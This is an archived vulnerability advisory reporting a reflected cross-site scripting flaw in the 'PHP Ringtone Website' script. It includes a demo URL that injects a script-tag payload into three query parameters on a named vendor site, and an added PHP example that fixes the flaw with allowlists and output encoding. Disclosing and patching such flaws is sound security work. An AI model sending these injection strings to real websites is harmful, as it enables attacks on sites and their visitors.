PHP Ringtone Website Cross Site Scripting

2012.01.16
Credit: Atmon3r
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

############################################################################
#
# Exploit Title: PHP Ringtone Website
# Date: 14/01/2012
# Author: Atmon3r
# Discovered By: Atmon3r
# Software Link: http://www.e-soft24.com/php-ringtone-website-p-351.html
# Version: All Version
# Security Risk: Low
# Tested on: GNU/Linux Ubuntu
#
############################################################################
#
# Exploit:
# http://www.website.com/[path]/ringtones.php?mmchar0_1=[xss]&mmstart0_1=1&mmsection0_1=[xss]
#
############################################################################
#
# Demo:
# http://www.e-soft24.com/ringtones/ringtones.php?mmchar0_1=G/"><script>alert('Xss By Atm0n3r')</script>&mmstart0_1=1&mmsection0_1=/"><script>alert('Xss By Atm0n3r')</script>
#
############################################################################

References:

http://www.e-soft24.com/php-ringtone-website-p-351.html
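One way to close the reflection reported above, as an added example that is not the vendor's code or the advisory author's: validate the three query parameters against allowlists and HTML-encode them wherever they are echoed. The application's source is not on this page, so the parameter meanings, the allowlist patterns and the helper names `h`, `query_string` and `read_filters` are assumptions.

```php
<?php
// Added example: hypothetical handling of the three query parameters named in
// the advisory. The real ringtones.php source is not shown on this page.

/** Encode a value for an HTML text node or a quoted attribute. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Return a scalar query parameter as a string; arrays (?x[]=1) become ''. */
function query_string(array $query, string $name): string
{
    $value = $query[$name] ?? '';
    return is_string($value) ? $value : '';
}

/** Assumed semantics: one-character filter, numeric offset, short section name. */
function read_filters(array $query): array
{
    $char = query_string($query, 'mmchar0_1');
    $section = query_string($query, 'mmsection0_1');
    $start = filter_var(
        query_string($query, 'mmstart0_1'),
        FILTER_VALIDATE_INT,
        ['options' => ['default' => 1, 'min_range' => 1]]
    );

    return [
        'char'    => preg_match('/\A[A-Za-z0-9]\z/', $char) ? $char : '',
        'start'   => $start,
        'section' => preg_match('/\A[A-Za-z0-9 _-]{1,40}\z/', $section) ? $section : '',
    ];
}

// Constructed sample input in the shape of the advisory's demo request.
$sample = [
    'mmchar0_1'    => 'G/"><script>alert(1)</script>',
    'mmstart0_1'   => '1',
    'mmsection0_1' => '/"><script>alert(1)</script>',
];
$filters = read_filters($sample);

// Validation rejects both values; encoding still applies at every output point.
printf(
    "<a href=\"ringtones.php?%s\">%s</a>\n",
    h(http_build_query(['mmchar0_1' => $filters['char'], 'mmstart0_1' => $filters['start']])),
    h($filters['section'] === '' ? 'All sections' : $filters['section'])
);
```

Pass `$_GET` to `read_filters()` in a real handler; the encoding step is the actual fix, and the allowlists only narrow what reaches it.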



Copyright 2024, cxsecurity.com

 
